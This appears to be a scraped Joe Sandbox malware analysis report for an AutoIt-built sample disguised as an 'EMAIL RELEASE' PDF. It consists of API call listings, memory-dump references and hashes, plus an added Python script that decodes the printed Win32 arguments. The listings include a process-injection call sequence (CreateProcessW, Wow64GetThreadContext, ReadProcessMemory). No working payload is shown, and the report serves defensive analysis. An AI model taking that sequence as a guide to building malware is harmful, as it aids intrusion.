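Joe Sandbox prints API arguments as raw stack slots, so the CreateFileW line above only becomes readable once decoded: GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, that is, open an existing file read-only, the same pattern as the function at 0xE84440, which later releases its buffer with VirtualFree(MEM_RELEASE). The decoder below is an added example, not code from Joe Sandbox or from this report; the parameter names and constants are the Win32 ones, and the sample lines are quoted from the APIs sections of this page (the MapVirtualKeyW line comes from the 0x770162 subcall listed further down; 0x5B is VK_LWIN and the other codes in that subcall are likewise modifier keys). The caveat a practitioner wants: when more slots are printed than the prototype has parameters (the VirtualFree line, or the CreateFileW call at 0x00E84511, whose first printed slot is 00000000 and whose real arguments appear to start one slot later), positional decoding is ambiguous, so the decoder reports such lines as not aligned instead of guessing.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Symbolic names for values the report prints as raw hex (Win32 header constants).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
              0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x40000000: "FILE_FLAG_OVERLAPPED"}
FREE_TYPE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
      0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
MAPVK = {0: "MAPVK_VK_TO_VSC", 1: "MAPVK_VSC_TO_VK", 2: "MAPVK_VK_TO_CHAR", 3: "MAPVK_VSC_TO_VK_EX"}

Formatter = Optional[Callable[[int], str]]


def bits(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as OR-ed names; bits the table does not know stay as hex."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def enum(value: int, table: Dict[int, str]) -> str:
    return table.get(value, hex(value))


# Parameter names in prototype order, with a formatter for flag and enum parameters.
PROTOTYPES: Dict[str, List[Tuple[str, Formatter]]] = {
    "CreateFileW": [
        ("lpFileName", None),
        ("dwDesiredAccess", lambda v: bits(v, GENERIC)),
        ("dwShareMode", lambda v: bits(v, SHARE)),
        ("lpSecurityAttributes", None),
        ("dwCreationDisposition", lambda v: enum(v, DISPOSITION)),
        ("dwFlagsAndAttributes", lambda v: bits(v, FILE_FLAGS)),
        ("hTemplateFile", None),
    ],
    "VirtualFree": [("lpAddress", None), ("dwSize", None),
                    ("dwFreeType", lambda v: bits(v, FREE_TYPE))],
    "MapVirtualKeyW": [("uCode", lambda v: enum(v, VK)),
                       ("uMapType", lambda v: enum(v, MAPVK))],
}

# "Name.Module(arg,arg,...), ref: address", as printed under "APIs" in the report.
CALL_RE = re.compile(r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def decode_call(line: str) -> dict:
    m = CALL_RE.search(line)
    if not m:
        raise ValueError(f"no call with argument list in: {line!r}")
    raw = [a.strip() for a in m["args"].split(",")] if m["args"].strip() else []
    proto = PROTOTYPES.get(m["func"], [])
    params: Dict[str, str] = {}
    for (name, fmt), token in zip(proto, raw):
        if token == "?":            # slot the sandbox could not resolve
            params[name] = "?"
        else:
            value = int(token, 16)
            params[name] = fmt(value) if fmt else f"{value:#x}"
    return {
        "func": m["func"], "module": m["module"], "ref": m["ref"],
        "params": params,
        "extra": raw[len(proto):],          # stack slots beyond the prototype's arity
        "aligned": bool(proto) and len(raw) == len(proto),
    }


# Lines quoted from this report's APIs sections.
SAMPLE_LINES = [
    "CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E84333",
    "VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E84737",
    "MapVirtualKeyW.USER32(0000005B,00000000), ref: 00770193",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        call = decode_call(line)
        note = "" if call["aligned"] else "  [extra slots printed; check alignment against the prototype]"
        print(f'{call["func"]} @ {call["ref"]}: {call["params"]}{note}')
```

Extending PROTOTYPES is the only change needed to cover the other calls on this page (CreateWindowExW, LoadStringW, Shell_NotifyIconW); keep the parameter order identical to the SDK prototype, because the decoder trusts position and nothing else.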

Control-flow Graph
• Function at 0x75407C (graph rendered as an image on the original page): internal calls 0x757A16, 0x757BCC, 0x757B2E, 0x756FE3, 0x757CAB, 0x758047, 0x772DE0, 0x75454E, 0x772DBC and 0x755904; LoadStringW sits on the 0x78D3C8 branch and Shell_NotifyIconW in the 0x7540ED block.
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078D3D7
  • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
• _memset.LIBCMT ref: 007540FC
• _wcscpy.LIBCMT ref: 00754150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00754160
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
• Opcode ID: 367aa84e7d4419f3adb30671e90a517a545298703e96840f937cf831b3572ee6
• Instruction ID: 186175a830248141a1d4bc80ab8081c183fcdf5058aaed98f83f267671a82654
• Opcode Fuzzy Hash: 367aa84e7d4419f3adb30671e90a517a545298703e96840f937cf831b3572ee6
• Instruction Fuzzy Hash: E931AF72408704EAD724EB60EC49BDA77DCAF84315F20851EF989921E1DBB8968CC796

Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction ID: db9f37ee7a4c5b90ee27666892f882eaa44d1f16054f108f49ed92a6b265f1ab
• Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction Fuzzy Hash: DB51C670A00B05DBCF249F69D88456E77A3EF403A1F24C729F83D962D1D7B89D608B41
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E0F
                                                                                                          • _free.LIBCMT ref: 0078E263
                                                                                                          • _free.LIBCMT ref: 0078E2AA
                                                                                                            • Part of subcall function 00756A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756BAD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                          • API String ID: 2861923089-1757145024
APIs
  • Part of subcall function 00770162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00770193
  • Part of subcall function 00770162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0077019B
  • Part of subcall function 00770162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007701A6
  • Part of subcall function 00770162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007701B1
  • Part of subcall function 00770162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007701B9
  • Part of subcall function 00770162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007701C1
  • Part of subcall function 007660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0075F930), ref: 00766154
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0075F9CD
• OleInitialize.OLE32(00000000), ref: 0075FA4A
• CloseHandle.KERNEL32(00000000), ref: 007945C8
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: %~
• API String ID: 1986988660-3145668672
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007535A1,SwapMouseButtons,00000004,?), ref: 007535D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 007535F5
• RegCloseKey.KERNELBASE(00000000,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 00753617
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00E8391D
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E83941
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E83963
Memory Dump Source
• Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: _memmove
• String ID: AU3!P/~$EA06
• API String ID: 4104443479-1801474073
APIs
• _memset.LIBCMT ref: 0078EA39
• GetOpenFileNameW.COMDLG32(?), ref: 0078EA83
  • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
  • Part of subcall function 00770791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007707B0
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 007B98F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007B990F
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00754370
                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00754415
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00754432
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_$_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1505330794-0
                                                                                                          • Opcode ID: 1840c3731dbc3f01cd9faae832c69fad6699ea3bfe111a1c8efcfff25df86687
                                                                                                          • Instruction ID: 613e84c96bd7e7e66c58a9e95cfaee72681ee096d9471b516a4d8c7e615fb4ea
                                                                                                          • Opcode Fuzzy Hash: 1840c3731dbc3f01cd9faae832c69fad6699ea3bfe111a1c8efcfff25df86687
                                                                                                          • Instruction Fuzzy Hash: E1319371505701DFD720DF24D8846DBBBF8FF48309F00492EE99A97251D7B9A988CB52
                                                                                                          APIs
                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00775733
                                                                                                            • Part of subcall function 0077A16B: __NMSG_WRITE.LIBCMT ref: 0077A192
                                                                                                            • Part of subcall function 0077A16B: __NMSG_WRITE.LIBCMT ref: 0077A19C
                                                                                                          • __NMSG_WRITE.LIBCMT ref: 0077573A
                                                                                                            • Part of subcall function 0077A1C8: GetModuleFileNameW.KERNEL32(00000000,008133BA,00000104,?,00000001,00000000), ref: 0077A25A
                                                                                                            • Part of subcall function 0077A1C8: ___crtMessageBoxW.LIBCMT ref: 0077A308
                                                                                                            • Part of subcall function 0077309F: ___crtCorExitProcess.LIBCMT ref: 007730A5
                                                                                                            • Part of subcall function 0077309F: ExitProcess.KERNEL32 ref: 007730AE
                                                                                                            • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
                                                                                                          • RtlAllocateHeap.NTDLL(00E40000,00000000,00000001,00000000,?,?,?,00770DD3,?), ref: 0077575F
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1372826849-0
                                                                                                          • Opcode ID: 7a7daa180372327fc890250675f93f9dfcad5a71bdf76f5b26dc5a9e92ea9f2f
                                                                                                          • Instruction ID: 965cd44fb03eddf97d81d8bde3e96b2fef7dfc8cddb2767fad8f8b5e14501d72
                                                                                                          • Opcode Fuzzy Hash: 7a7daa180372327fc890250675f93f9dfcad5a71bdf76f5b26dc5a9e92ea9f2f
                                                                                                          • Instruction Fuzzy Hash: 96019275340B05DAEE182738EC4AA6E67589F827E2F50C525F41DEA191DFBC9C0056A1
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007B9548,?,?,?,?,?,00000004), ref: 007B98BB
                                                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007B98D1
                                                                                                          • CloseHandle.KERNEL32(00000000,?,007B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B98D8
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 3397143404-0
                                                                                                          • Opcode ID: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                          • Instruction ID: 0357bc8e683137d469c2af57890d0227d39b5ae7acecc5ced28ecc6d75a61d4d
                                                                                                          • Opcode Fuzzy Hash: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                          • Instruction Fuzzy Hash: 56E08632141228B7D7211B54EC09FCA7F29AF06760F148121FB25690E087B61611979C
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 007B8D1B
                                                                                                            • Part of subcall function 00772D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00779A24), ref: 00772D69
                                                                                                            • Part of subcall function 00772D55: GetLastError.KERNEL32(00000000,?,00779A24), ref: 00772D7B
                                                                                                          • _free.LIBCMT ref: 007B8D2C
                                                                                                          • _free.LIBCMT ref: 007B8D3E
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                          • Instruction ID: c4831ac2bfae1f57e1ef63a50a24b752b2c47bfd3d36a32ab715a05e46f06152
                                                                                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                          • Instruction Fuzzy Hash: A0E012A170160186CF74A579A944BD313DC4F5C392718491EB41DD7187CE6CF843C124
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CALL
                                                                                                          • API String ID: 0-4196123274
                                                                                                          • Opcode ID: 82666099f70c0560f1adff194d520f2599b169de79a8f78627cce2f4d46272fb
                                                                                                          • Instruction ID: dc8db130ec1ca5e1848a9615ca12d5c33d126b7f90d0d1b23d1cfd6b5cdac3ba
                                                                                                          • Opcode Fuzzy Hash: 82666099f70c0560f1adff194d520f2599b169de79a8f78627cce2f4d46272fb
                                                                                                          • Instruction Fuzzy Hash: FB226E70608301DFDB24DF14C454AAAB7E1FF44305F15896DE88A8B361D7B9ED49CB92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00754BEF
                                                                                                            • Part of subcall function 0077525B: __wfsopen.LIBCMT ref: 00775266
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E0F
                                                                                                            • Part of subcall function 00754B6A: FreeLibrary.KERNEL32(00000000), ref: 00754BA4
                                                                                                            • Part of subcall function 00754C70: _memmove.LIBCMT ref: 00754CBA
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1396898556-2740779761
                                                                                                          • Opcode ID: 4d0a8e9288e26beb0084ab9584e69c81f4d46d29ba4e13117188aafde232995a
                                                                                                          • Instruction ID: a45d84121cc71bcfb559dc8a37a45257bea3cf09e2b67ec0e45b6a8a5ca7dd34
                                                                                                          • Opcode Fuzzy Hash: 4d0a8e9288e26beb0084ab9584e69c81f4d46d29ba4e13117188aafde232995a
                                                                                                          • Instruction Fuzzy Hash: 2811C471600205EBCF24BF74C81BFED77A4AF44715F108429F942A7181DAB99E489B50
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                          • Instruction ID: 7d0dd621627d375c2bc84c902952290cb9a060204ac7d54d09e654d796f9c6f0
                                                                                                          • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                          • Instruction Fuzzy Hash: 1531A4B1604606EFC718DF68D8D1DA9B3A9FF48310715C629F919CB391EB78E914CB90
                                                                                                          APIs
                                                                                                            • Part of subcall function 0077571C: __FF_MSGBANNER.LIBCMT ref: 00775733
                                                                                                            • Part of subcall function 0077571C: __NMSG_WRITE.LIBCMT ref: 0077573A
                                                                                                            • Part of subcall function 0077571C: RtlAllocateHeap.NTDLL(00E40000,00000000,00000001,00000000,?,?,?,00770DD3,?), ref: 0077575F
                                                                                                          • std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                            • Part of subcall function 0077859B: RaiseException.KERNEL32(?,?,?,00809E78,00000000,?,?,?,?,00770E06,?,00809E78,?,00000001), ref: 007785F0
                                                                                                          Similarity
                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 3902256705-0
                                                                                                          • Opcode ID: 9ccad867af6eab42ae695519099a7d5167e35f4e8459ed278369a112bc9f14de
                                                                                                          • Instruction ID: 71e57ed701375c573fee95f34552b0ae184a8d9bfed683ee27f1b97aadb1f276
                                                                                                          • Opcode Fuzzy Hash: 9ccad867af6eab42ae695519099a7d5167e35f4e8459ed278369a112bc9f14de
                                                                                                          • Instruction Fuzzy Hash: 75F0A93164031DE6CF20FBA9DC099DF77AC9F05391F108429F91C96182DFF89A5191D1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
• Opcode ID: a71b95d9cd138810cb5a50b4b8b6d311a38fcffa94e121896ebf330cb8db15b1
• Instruction ID: fd57c7026a209f607e1314d751bad5bdb60fc628cb8700e088fad6e7e809c216
• Opcode Fuzzy Hash: a71b95d9cd138810cb5a50b4b8b6d311a38fcffa94e121896ebf330cb8db15b1
• Instruction Fuzzy Hash: BC01F7B1C00A08EBCF62AF64CC0A49E7B61EF517E1F54C115F82C9A191DB7D8A11DF92
APIs
  • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
• __lock_file.LIBCMT ref: 007753EB
  • Part of subcall function 00776C11: __lock.LIBCMT ref: 00776C34
• __fclose_nolock.LIBCMT ref: 007753F6
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
